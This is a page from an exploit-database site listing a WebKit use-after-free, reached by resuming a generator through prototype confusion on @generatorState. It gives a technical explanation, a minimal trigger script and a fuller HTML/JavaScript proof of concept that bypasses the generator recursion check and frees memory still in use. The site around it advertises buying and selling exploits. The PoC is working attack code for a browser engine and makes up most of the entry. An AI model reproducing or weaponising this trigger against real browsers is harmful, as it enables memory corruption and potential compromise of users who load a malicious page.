0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WebKit - Use-After-Free when Resuming Generator Exploit
Author
Risk
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
<!-- In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling: var state = this.@generatorState; and set by calling: generator.@generatorState = @GeneratorStateExecuting; Checking that the @generator property is set is also used in place of type checking the generator. Therefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed. It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype. Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free. A minimal sample of the script causing this problem is below, and a full PoC is attached. var iterator; var a = []; function* foo(index) { while (1) { var q = a.pop(); if(q){ q.__proto__ = iterator; q.next(); } yield index++; } } function* foo2(){ yield; } var temp = foo2(0); for(var i = 0; i < 10; i++){ // make a few objects with @generatorState set var q = {}; q.__proto__ = temp; q.next(); q.__proto__ = {}; a.push(q); } iterator = foo(0); var q = {}; q.__proto__ = iterator; print(q.next().value); --> <html><body><script> print = console.log; print("top"); var iterator; var o = function(){print("hello")}; var a = []; function* foo(index) { //print("start"); while (1) { //if(index == 77){ // o = 0; // gc(); // index = 2; // var a = [1, 2, 3, 4]; //yield 9; //print("a vale " + a[0]); //} //if(index == 1){ //index = 77; // print("INTERNAL CALL") // iterator.next(); //index++; //} //var b = [1, 2, 3, 4]; var q = a.pop(); if(q){ print("here1"); q.__proto__ = iterator; q.next(); } yield index++; //print("bval" + b[0]); } } function* foo2(){ yield; } var temp = foo2(0); for(var i = 0; i < 10; i++){ var q = {}; q.__proto__ = temp; q.next(); q.__proto__ = {}; a.push(q); } //print(a); iterator = foo(0); // expected output: 0 o.__proto__ = iterator; //print("FIRST CALL") //print(o.next().value); //print("SECOND CALL") //print(o.next().value); //print("THIRD CALL") for(var i = 0; i < 10; i++){ var q = {}; q.__proto__ = iterator; print(q.next("hello").value); } //print("FOURTH CALL") //print(iterator.next().value); o(); </script></body></html> # 0day.today [2024-06-23] #